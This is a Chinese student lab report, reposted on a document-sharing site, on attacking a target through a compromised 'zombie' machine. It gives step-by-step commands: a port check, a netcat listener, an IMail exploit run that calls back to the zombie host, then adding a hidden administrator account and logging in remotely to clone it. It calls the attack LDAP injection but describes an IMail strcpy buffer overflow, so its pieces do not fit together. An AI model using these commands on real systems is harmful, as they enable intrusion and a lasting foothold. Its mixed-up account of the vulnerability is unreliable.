- 1、本文档共5页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
利用肉机攻击目标机LDAP注入漏洞攻击
河南工业大学
LDAP注入漏洞攻击
实验目的:黑客利用肉机攻击目标机开放的端口,利用肉机的目的是隐藏自己的身份,以免被发现。 LDAP是轻量目录访问协议,它是基于X.500标准的开放式标准协议。当一个Web应用程序没有正确消除用户提供的输入信息,是很有可能被攻击者改变LDAP语句的设置。 危害 攻击者能够修改LDAP声明,这一进程将运行与组件执行的命令相同的权限。(如数据库服务器、Web应用服务器、Web服务器等)。这可能会导致严重的安全问题,如可以查询权限外信息的权利,修改或删除LDAP树里面的任何信息。BUGTRAQ?ID:?25762? IPSwitch?IMail是一款基于Windows的邮件服务程序。? IPSwitch?IMail的iaspam.dll中存在缓冲区溢出漏洞,远程攻击者可能利用此洞控制服务器。? 相关细节:? loc_1001ada5???????==?注意动态调试时候注意加载基址的不同。 mov????eax,?[ebp+var_54] mov????ecx,?[eax+10c8h] push???ecx?????????????????;?char?* mov????edx,?[ebp+var_54] mov????eax,?[edx+10d0h] push???eax?????????????????;?char?* call???_strcpy add????esp,?8 jmp????loc_1001a6f0 ? 这里strcpy的两个buffer,src和dst的指针是直接从堆里读出来的,而之前没有做任何检查,所以发送恶意邮件到服务器(SMD文件),然后在其后的偏移处控制这两个地址,就可以拷贝任意字符串到任意内存。Internet出口地址:202.29.12.100
则:DMz administrator看到的应为即内部地址:192.168.11.100
但从cmd 中的命令行看到的是internet出口地址202.29.12.100
实验步骤:
1、本地机运行cmd命令进入命令提示状态;
提示结果:
2、测试目标机的端口389:
使用命令:telnet 目标机 端口
具体为:telnet 192.168.11.61 389
提示结果:当目标机389端口打开时显示黑屏,则认为目标机的389端口已打开。
3、监听目标机的端口81(80一般不用)
使用命令:nc –l –p 81 //其中:-l 表示监听, -p表示端口,81和80为本地机器的端口。
提示结果:
4、另外打开一个命令窗口,因为nc命令一直在监听81端口
方法:运行cmd
提示结果:
5、输入imail命令,进入对方机器
使用命令:imail 7_8 –t 0 –h 目标机 –i 肉机 –p 81 //其中:-h表示目标机,-i表示肉机
具体为:imail 7_8 –t 0 –h 192.168.11.61 –i 192.168.11.66 –p 81
提示结果:
6、在目标机中加入用户
使用命令:net user 用户名 密码 /add
具体为:net user xun 123 /add
提示结果:
7、将所加用户加入组本地组
使用命令:net localgroup administrators 用户名 /add
具体为:net localgroup administrators xun /add
提示结果:
8、运行mtstc文件,连接目标机,进行用户名登陆,并且进行克隆账号
使用命令:mtstc
提示结果:
9、进入对方机器
点击连接按钮即可
实验总结:
这个实验类似于账号克隆,利用LDAP漏洞,用肉机攻击目标机,通过远程登录到目标机,在克隆账号,以便可以都可以远程控制目标机,来达到自己的目的。
文档评论(0)